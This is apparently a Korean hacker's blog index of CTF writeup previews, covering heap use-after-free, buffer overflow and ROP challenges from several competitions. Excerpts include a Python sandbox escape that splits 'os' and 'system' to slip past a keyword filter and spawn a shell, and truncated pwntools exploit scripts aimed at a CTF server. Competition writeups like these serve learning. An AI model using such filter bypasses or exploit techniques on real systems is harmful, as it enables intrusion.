Profile

머리정리하는곳

c2w2m2

Codegate2018

그냥 대충 한줄씩 적는다 catshop 이게 아마 uaf엿을거다 Daysnote 이거 시간 안뺏기고, heapbabe 햇으면 아마 1등 했을텐데 ㅠ g0crack이거 젤 빨리 푼거 같다. 진짜 막힘 없이 쭉쭉 푼듯 머 canary leak 하고 bof 하는거 있엇는데 문제가 기억이 안난다. 너무 졸리다 heapbabe uaf로 function ptr한바이트 주작쳐서 leak하고, 그걸로 system('/bin/sh') 꼴 만들어서 쓱쓱하면된다. 이걸 왜 대회때 못했지,,

CTF Writeup ·

Hacking camp CTF

그냥 푼것중에 좀 쓸만하다 대충 메모. Prision 인가 파이제일 문제 뭘 입력해도 값이 안오는데 문제 이름이나 설명보면 젤브레이크는 맞는거 같고 하다가, help() 를 쳤더니, 연결은 끊기지 않은 채로 아무것도 안나왔다. 그래서, help("print") 같은걸로 했는데 막 뭐가 나오기 시작했다. 그래서 아 실행 되는구나랑, 이걸로 필터링 체크가 가능하겠다 싶어서, help("os") 이런식으로 필터링 체크를 했고, getattr(__import__("o"+"s"),"sy"+"stem")("sh") 같은걸로 쉘땄다. READ FLAG CTF 끝나고 풀었다. 힌트로 _ 우회된다는데, CTF 시간때는 로컬에서 퍼징했을때 아무것도 안되서 포기하고 아카이브 했는데, 대회 끝나고 서버에다가 퍼징하니까 + 로..

CTF Writeup ·

CodeGate2018 Junior Writeup

CTF Writeup ·

[ROOT] Write up

2등~!~!~!~!~!~!~!~!

CTF Writeup ·

[SECCON] writeup

왜 writeup 이 여기 올라와있냐면 몇명이서 1일 1폰 스터디 만들었는데 1폰한게 세콘이라서 여따가 올린다 ㅎㅋ... Vigenere3d 이런 코드와 함께 실행 결과를 준다. 빙그레는 뭐다? Brute force다. 먼제 빙그레 할떄 쓰는 키 2개가 서로 리버스 된 결과임을 염두해야 하고, 키의 길이가 14자리 임으로 7자리만 구하면 리버스 해서 키의 원문을 구해낼 수 있다. import sysimport stringdef _l(idx, s): return s[idx:] + s[:idx] s = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz_{}"t = [[_l((i+j) % len(s), s) for j in range(len(s)..

CTF Writeup ·

[Tu-ctf] writeup

Guestbook read - 6번에서 dest 부터 시작해서 다 릭이 가능함 -> heap 주소, system 주소 , libc , binsh 릭 가능 그리고 write - 6번에서 또 dest 부터 다 쓰기가 가능함 -> ㅈㅈ from pwn import * p = remote("guestbook.tuctf.com", 4545) #p = process("./guestbook") context.log_level = 'debug' p.sendline("adsf") p.sendline("qwer") p.sendline("zvcx") p.sendline("sdfg") p.sendline("1") p.recvuntil("Which entry do you want to view?\n>>>") p.sendline..

CTF Writeup ·

ubuntu ctf write up

http://h3x0r.tistory.com/1 h3x0r 블로그 첫글 먹었습니다 ㅎㅋㅎㅋㅎㅋ

CTF Writeup ·

[Cyber-guardians] 본선 write up

2등 먹었슴다~!!~!!~!~!~!!!~!~!!~!~!~!~!!~~!!~!~!!!~!~!~ 포넙3개랑 리버싱 1개 올림니다(사실 network 도 풀었는데 넘 쉬웠어서 생략하겠슴다) alien_hunter(200) integer overflow 를 통해서 게임에서 이기고bof 로 쓱싹 하면 되는 문제였습니다. from pwn import * p = process("./alien_hunter")context.log_level='debug'def kill():for i in range(0,9):p.sendline('1')p.sendline('2')for i in range(0,4):p.sendline('1') kill() read_plt = 0x08048410pppr = 0x08048819bss = 0x80..

CTF Writeup ·

[화이트해커리그] Write up

예선 5등 먹었슴다 (grin)

CTF Writeup ·